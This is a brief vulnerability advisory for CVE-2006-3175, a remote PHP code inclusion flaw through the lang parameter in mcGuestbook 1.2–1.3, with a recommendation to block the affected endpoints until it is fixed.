CVE-2006-3175

Name of the Vulnerable Software and Affected Versions mcGuestbook versions 1.2 through 1.3

Description The issue allows remote attackers to execute arbitrary PHP code via a URL in the lang parameter to API endpoints such as "admin.php", "ecrire.php", and "lire.php". It is noted that the issue might be limited to a race condition during installation or an improper installation, since a completed installation creates an include file that prevents external control of the lang variable.

Recommendations For mcGuestbook versions 1.2 through 1.3, consider disabling access to the "admin.php", "ecrire.php", and "lire.php" API endpoints until a proper fix is applied, and ensure proper installation to prevent external control of the lang variable.